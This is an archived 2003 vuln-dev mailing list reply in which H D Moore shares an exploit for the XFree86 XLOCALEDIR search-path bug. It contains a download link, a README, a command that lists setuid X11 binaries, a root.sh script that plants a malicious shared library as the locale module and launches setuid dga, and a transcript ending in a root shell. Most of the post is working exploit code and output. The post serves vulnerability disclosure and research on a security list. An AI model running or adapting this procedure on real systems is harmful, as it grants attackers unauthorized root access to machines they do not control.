Re: xscreensaver exploit for Redhat 7.3

From: H D Moore (sflist@digitaloffense.net)
Date: 03/09/03

  • Next message: Adam Gilmore: "RE: xscreensaver exploit for Redhat 7.3"
    From: H D Moore <sflist@digitaloffense.net>
    To: "Adam Gilmore" <vuln@optusnet.com.au>, <vuln-dev@securityfocus.com>
    Date: Sun, 9 Mar 2003 02:51:19 -0600
    
    

    An old exploit I wrote for the XLOCALEDIR search path bug, it should apply
    to a default Red Hat 7.3 install...

    http://www.digitaloffense.net/shared_library_toys/xlocaledir.tar.gz

    ---
    $ cat README
    This is an exploit for a bug in xf86 4.2.0 and below, an announcement was
    made by SuSE, with id SuSE-SA:2002:032.
    There is one major caveat to it though, the setuid application you call
    has to call XtAppInitialize as root. The "xterm" example in the
    tarball will absolutely not work, because it drops privileges before
    initializing the application...
    $ ./xterm
    ** calling XtSetLanguageProc as 500/0
    ** called XtSetLanguageProc as 500/0
    ( xterm drops privs here )
    ** XtSetErrorHandler: 500/500
    ** XtAppInitialize: 500/500
    ** not launching a shell, since we are running as id 500 (<- exploit.so)
    ** XtSetErrorHandler: 500/500
    ** XtGetApplicationResources: 500/500
    Failed to open input method
    (complains that the locale stuff is broken)
    (launches xterm)
    So.. For this to be useful at all, you have to find a setuid app which
    doesn't drop privileges until after the XtAppInitialize call :(
    To get a list of all suid's linked against libX11:
    # find / -perm +4000 -type f | xargs -i bash -c 'echo "Testing {}";ldd
    {}|grep X11'
    Once you find a linked binary (not xterm or cardinfo though), edit root.sh
    and change the xterm line to the name of the binary. Execute root.sh
    and see if it drops a root shell ;)
    The "dga" setuid on SuSE 8.0 gives root in a default install, just don't
    run the exploit with the same X display as the one you are using or dga
    will more than likely crash it. Either run the exploit from the console
    (or remote connection), setting the display to :0.0, or start a second X
    server up just to exploit (method used below).
    hdm@masada:/projects/xlocaledir> cat root.sh
    #!/bin/sh
    #########
    rm -rf locale
    cp -a /usr/lib/X11/locale locale
    make clean
    make
    cp exploit.so locale/common/xlcDef.so.2
    export XLOCALEDIR=`pwd`/locale
    # call your setuid here...
    /usr/X11R6/bin/dga
    hdm@masada:/projects/xlocaledir> Xwrapper :1 &
    [1] 1480
    hdm@masada:/projects/xlocaledir>
    XFree86 Version 4.2.0 / X Window System
    (protocol Version 11, revision 0, vendor release 6600)
    Release Date: 23 January 2002
            If the server is older than 6-12 months, or if your card is
            newer than the above date, look for a newer version before
            reporting problems.  (See http://www.XFree86.Org/)
    Build Operating System: SuSE Linux [ELF] SuSE
    Module Loader present
    Markers: (--) probed, (**) from config file, (==) default setting,
             (++) from command line, (!!) notice, (II) informational,
             (WW) warning, (EE) error, (NI) not implemented, (??) unknown.
    (==) Log file: "/var/log/XFree86.1.log", Time: Thu Sep 19 13:45:56 2002
    (==) Using config file: "/etc/X11/XF86Config"
    (II) [GLX]: Calling GlxExtensionInit
    hdm@masada:/projects/xlocaledir> export DISPLAY=:1.0
    hdm@masada:/projects/xlocaledir> ./root.sh
    /bin/rm -f   exploit.o exploit.so
    gcc -fPIC -c exploit.c
    gcc -shared -nostdlib exploit.o -o exploit.so
    1 addr:0x40227000, width 1792, bank size 33357824, depth 24 planes
    ** attempting to drop a root shell...
    sh-2.05# (II) [GLX]: Calling GlxExtensionInit
    sh-2.05# id
    uid=0(root) gid=100(users)
    groups=100(users),14(uucp),16(dialout),17(audio),33(video),42(trusted)
    On Saturday 08 March 2003 02:47 am, Adam Gilmore wrote:
    > I don't think there are any vulnerabilities for the default
    > installation of RH7.3 (as far as suid root apps go). I tested this
    > vulnerability on xterm as well, but it seems xterm on RH7.3 drops root
    > privileges before it overflows. And besides, xterm isn't setuid root on
    > RH7.3 by default. So this isn't a *major* security risk for rh.
    >
    > -----Original Message-----
    > From: Inode [mailto:inode@mediaservice.net]
    > Sent: Saturday, 8 March 2003 6:46 AM
    > To: vuln-dev@securityfocus.com
    > Subject: Re: xscreensaver exploit for Redhat 7.3
    >
    > Hi all,
    > exploit attached.
    >
    > Comments are welcome.
    >
    > Sincerely,
    >
    > +-------------------------------------------------------------------+
    >
    > | Agazzini Maurizio                       Tel:   +39-011-32.72.100  |
    > | Security Analyst                        Fax:   +39-011-32.46.497  |
    > | @ Mediaservice.net S.R.L.          D.S.D. Data Security Division  |
    > |
    > | PGP Key   : http://www.wayreth.eu.org/Inode.asc                   |
    > | Disclaimer: http://@Mediaservice.net/disclaimer                   |
    >
    > +-------------------------------------------------------------------+
    

  • Next message: Adam Gilmore: "RE: xscreensaver exploit for Redhat 7.3"